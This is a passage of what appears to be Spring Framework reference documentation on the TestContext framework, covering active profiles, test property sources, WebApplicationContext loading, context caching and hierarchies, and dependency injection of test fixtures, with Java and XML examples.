The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. 
For further information, refer to the
corresponding javadocs.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package com.bank.service;

	// "dev" profile overridden programmatically via a custom resolver
	@ActiveProfiles(
		resolver = OperatingSystemActiveProfilesResolver.class,
		inheritProfiles = false)
	public class TransferServiceTest extends AbstractIntegrationTest {
		// test body
	}
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package com.bank.service.test;

	public class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {

		@Override
		public String[] resolve(Class<?> testClass) {
			String profile = ...;
			// determine the value of profile based on the operating system
			return new String[] {profile};
		}
	}
----

[[testcontext-ctx-management-property-sources]]
===== Context configuration with test property sources

Spring 3.1 introduced first-class support in the framework for the notion of an
environment with a hierarchy of _property sources_, and since Spring 4.1 integration
tests can be configured with test-specific property sources. In contrast to the
`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`
annotation can be declared on a test class to declare resource locations for test
properties files or _inlined_ properties. These test property sources will be added to
the set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded
for the annotated integration test.

[NOTE]
====
`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`
SPI, but `@TestPropertySource` is not supported with implementations of the older
`ContextLoader` SPI.

Implementations of `SmartContextLoader` gain access to merged test property source values
via the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in
`MergedContextConfiguration`.
====

*Declaring test property sources*

Test properties files can be configured via the `locations` or `value` attribute of
`@TestPropertySource` as shown in the following example.

Both traditional and XML-based properties file formats are supported -- for example,
`"classpath:/com/example/test.properties"` or `"file:///path/to/file.xml"`.

Each path will be interpreted as a Spring `Resource`. A plain path -- for example,
`"test.properties"` -- will be treated as a classpath resource that is _relative_ to the
package in which the test class is defined. A path starting with a slash will be treated
as an _absolute_ classpath resource, for example: `"/org/example/test.xml"`. A path which
references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will
be loaded using the specified resource protocol. Resource location wildcards (e.g.,
`**/*.properties`) are not permitted: each location must evaluate to exactly one
`.properties` or `.xml` resource.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	@TestPropertySource("/test.properties")
	public class MyIntegrationTests {
		// class body...
	}
----

_Inlined_ properties in the form of key-value pairs can be configured via the
`properties` attribute of `@TestPropertySource` as shown in the following example.
All
key-value pairs will be added to the enclosing `Environment` as a single test
`PropertySource` with the highest precedence.

The supported syntax for key-value pairs is the same as the syntax defined for entries in
a Java properties file:

* `"key=value"`
* `"key:value"`
* `"key value"`

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	@TestPropertySource(properties = {"timezone = GMT", "port: 4242"})
	public class MyIntegrationTests {
		// class body...
	}
----

*Default properties file detection*

If `@TestPropertySource` is declared as an empty annotation (i.e., without explicit
values for the `locations` or `properties` attributes), an attempt will be made to detect
a _default_ properties file relative to the class that declared the annotation. For
example, if the annotated test class is `com.example.MyTest`, the corresponding default
properties file is `"classpath:com/example/MyTest.properties"`. If the default cannot be
detected, an `IllegalStateException` will be thrown.

*Precedence*

Test property sources have higher precedence than those loaded from the operating
system's environment or Java system properties as well as property sources added by the
application declaratively via `@PropertySource` or programmatically. Thus, test property
sources can be used to selectively override properties defined in system and application
property sources. Furthermore, inlined properties have higher precedence than properties
loaded from resource locations.

In the following example, the `timezone` and `port` properties as well as any properties
defined in `"/test.properties"` will override any properties of the same name that are
defined in system and application property sources. Furthermore, if the
`"/test.properties"` file defines entries for the `timezone` and `port` properties, those
will be overridden by the _inlined_ properties declared via the `properties` attribute.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@ContextConfiguration
	@TestPropertySource(
		locations = "/test.properties",
		properties = {"timezone = GMT", "port: 4242"}
	)
	public class MyIntegrationTests {
		// class body...
	}
----

*Inheriting and overriding test property sources*

`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`
attributes that denote whether resource locations for properties files and inlined
properties declared by superclasses should be __inherited__. The default value for both
flags is `true`. This means that a test class inherits the locations and inlined
properties declared by any superclasses. Specifically, the locations and inlined
properties for a test class are appended to the locations and inlined properties declared
by superclasses. Thus, subclasses have the option of __extending__ the locations and
inlined properties. Note that properties that appear later will __shadow__ (i.e.,
override) properties of the same name that appear earlier.
In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class __shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. 
You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested `@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. 
`ServletTestExecutionListener` also ensures that the\n`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test\ninstance, and once the test is complete it cleans up thread-local state.\n\nOnce you have a `WebApplicationContext` loaded for your test you might find that you\nneed to interact with the web mocks -- for example, to set up your test fixture or to\nperform assertions after invoking your web component. The following example demonstrates\nwhich mocks can be autowired into your test instance. Note that the\n`WebApplicationContext` and `MockServletContext` are both cached across the test suite;\nwhereas, the other mocks are managed per test method by the\n`ServletTestExecutionListener`.\n\n.Injecting mocks\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextConfiguration\n\tpublic class WacTests {\n\n\t\t@Autowired\n\t\tWebApplicationContext wac; \/\/ cached\n\n\t\t@Autowired\n\t\tMockServletContext servletContext; \/\/ cached\n\n\t\t@Autowired\n\t\tMockHttpSession session;\n\n\t\t@Autowired\n\t\tMockHttpServletRequest request;\n\n\t\t@Autowired\n\t\tMockHttpServletResponse response;\n\n\t\t@Autowired\n\t\tServletWebRequest webRequest;\n\n\t\t\/\/...\n\t}\n----\n--\n\n[[testcontext-ctx-management-caching]]\n===== Context caching\n\nOnce the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)\nfor a test, that context will be cached and reused for __all__ subsequent tests that\ndeclare the same unique context configuration within the same test suite. To understand\nhow caching works, it is important to understand what is meant by __unique__ and __test\nsuite__.\n\nAn `ApplicationContext` can be __uniquely__ identified by the combination of\nconfiguration parameters that is used to load it. Consequently, the unique combination\nof configuration parameters is used to generate a __key__ under which the context is\ncached. The TestContext framework uses the following configuration parameters to build\nthe context cache key:\n\n* `locations` __(from @ContextConfiguration)__\n* `classes` __(from @ContextConfiguration)__\n* `contextInitializerClasses` __(from @ContextConfiguration)__\n* `contextCustomizers` __(from ContextCustomizerFactory)__\n* `contextLoader` __(from @ContextConfiguration)__\n* `parent` __(from @ContextHierarchy)__\n* `activeProfiles` __(from @ActiveProfiles)__\n* `propertySourceLocations` __(from @TestPropertySource)__\n* `propertySourceProperties` __(from @TestPropertySource)__\n* `resourceBasePath` __(from @WebAppConfiguration)__\n\nFor example, if `TestClassA` specifies `{\"app-config.xml\", \"test-config.xml\"}` for the\n`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework\nwill load the corresponding `ApplicationContext` and store it in a `static` context cache\nunder a key that is based solely on those locations. So if `TestClassB` also defines\n`{\"app-config.xml\", \"test-config.xml\"}` for its locations (either explicitly or\nimplicitly through inheritance) but does not define `@WebAppConfiguration`, a different\n`ContextLoader`, different active profiles, different context initializers, different\ntest property sources, or a different parent context, then the same `ApplicationContext`\nwill be shared by both test classes. 
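By way of illustration, that caching scenario might look like the following minimal
sketch (the two configuration files are assumed to exist on the classpath):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration({"app-config.xml", "test-config.xml"})
	public class TestClassA {
		// the ApplicationContext is loaded once and cached under a key
		// derived from the configuration declared above
	}

	@RunWith(SpringRunner.class)
	@ContextConfiguration({"app-config.xml", "test-config.xml"})
	public class TestClassB {
		// identical configuration: the context cached for TestClassA
		// is reused instead of being loaded again
	}
----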
This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince Spring Framework 4.3, the size of the context cache is bounded with a default\nmaximum size of 32. Whenever the maximum size is reached, a _least recently used_ (LRU)\neviction policy is used to evict and close stale contexts. The maximum size can be\nconfigured from the command line or a build script by setting a JVM system property named\n`spring.test.context.cache.maxSize`. As an alternative, the same property can be set\nprogrammatically via the `SpringProperties` API.\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ``ApplicationContext``s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. 
This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nSince Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit 4 based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. 
The result is
that three application contexts will be loaded (one for each declaration of
`@ContextConfiguration`), and the application context loaded based on the configuration
in `AbstractWebTests` will be set as the parent context for each of the contexts loaded
for the concrete subclasses.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("file:src/main/webapp/WEB-INF/applicationContext.xml")
	public abstract class AbstractWebTests {}

	@ContextHierarchy(@ContextConfiguration("/spring/soap-ws-config.xml"))
	public class SoapWebServiceTests extends AbstractWebTests {}

	@ContextHierarchy(@ContextConfiguration("/spring/rest-ws-config.xml"))
	public class RestWebServiceTests extends AbstractWebTests {}
----
--


.Class hierarchy with merged context hierarchy configuration
--
The following classes demonstrate the use of __named__ hierarchy levels in order to
__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`
defines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends
`BaseTests` and instructs the Spring TestContext Framework to merge the context
configuration for the `child` hierarchy level, simply by ensuring that the names
declared via the `name` attribute in `@ContextConfiguration` are both `"child"`. The
result is that three application contexts will be loaded: one for `"/app-config.xml"`,
one for `"/user-config.xml"`, and one for `{"/user-config.xml", "/order-config.xml"}`.
As with the previous example, the application context loaded from `"/app-config.xml"`
will be set as the parent context for the contexts loaded from `"/user-config.xml"`
and `{"/user-config.xml", "/order-config.xml"}`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextHierarchy({
		@ContextConfiguration(name = "parent", locations = "/app-config.xml"),
		@ContextConfiguration(name = "child", locations = "/user-config.xml")
	})
	public class BaseTests {}

	@ContextHierarchy(
		@ContextConfiguration(name = "child", locations = "/order-config.xml")
	)
	public class ExtendedTests extends BaseTests {}
----
--

.Class hierarchy with overridden context hierarchy configuration
--
In contrast to the previous example, this example demonstrates how to __override__ the
configuration for a given named level in a context hierarchy by setting the
`inheritLocations` flag in `@ContextConfiguration` to `false`.
Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to perform <<core.adoc#beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit 4. 
The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit 4 based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. 
In
such a case, you can override the setter method and use the `@Qualifier` annotation to
indicate a specific target bean as follows, but make sure to delegate to the overridden
method in the superclass as well.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	// ...

		@Autowired
		@Override
		public void setDataSource(**@Qualifier("myDataSource")** DataSource dataSource) {
			**super**.setDataSource(dataSource);
		}

	// ...
----

The specified qualifier value indicates the specific `DataSource` bean to inject,
narrowing the set of type matches to a specific bean. Its value is matched against
`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name
is used as a fallback qualifier value, so you may effectively also point to a specific
bean by name there (as shown above, assuming that "myDataSource" is the bean id).
====


[[testcontext-web-scoped-beans]]
==== Testing request and session scoped beans

<<core.adoc#beans-factory-scopes-other,Request and session scoped beans>> have been supported by
Spring since the early years, and since Spring 3.2 it's a breeze to test your
request-scoped and session-scoped beans by following these steps.

* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test
 class with `@WebAppConfiguration`.
* Inject the mock request or session into your test instance and prepare your test
 fixture as appropriate.
* Invoke your web component that you retrieved from the configured
 `WebApplicationContext` (i.e., via dependency injection).
* Perform assertions against the mocks.

The following code snippet displays the XML configuration for a login use case. Note
that the `userService` bean has a dependency on a request-scoped `loginAction` bean.
Also, the `LoginAction` is instantiated using <<core.adoc#expressions,SpEL expressions>> that
retrieve the username and password from the current HTTP request. In our test, we will
want to configure these request parameters via the mock managed by the TestContext
framework.

.Request-scoped bean configuration
[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>

		<bean id="userService"
				class="com.example.SimpleUserService"
				c:loginAction-ref="loginAction" />

		<bean id="loginAction" class="com.example.LoginAction"
				c:username="#{request.getParameter('user')}"
				c:password="#{request.getParameter('pswd')}"
				scope="request">
			<aop:scoped-proxy />
		</bean>

	</beans>
----

In `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under
test) and the `MockHttpServletRequest` into our test instance. Within our
`requestScope()` test method we set up our test fixture by setting request parameters in
the provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our
`userService` we are assured that the user service has access to the request-scoped
`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set
parameters in).
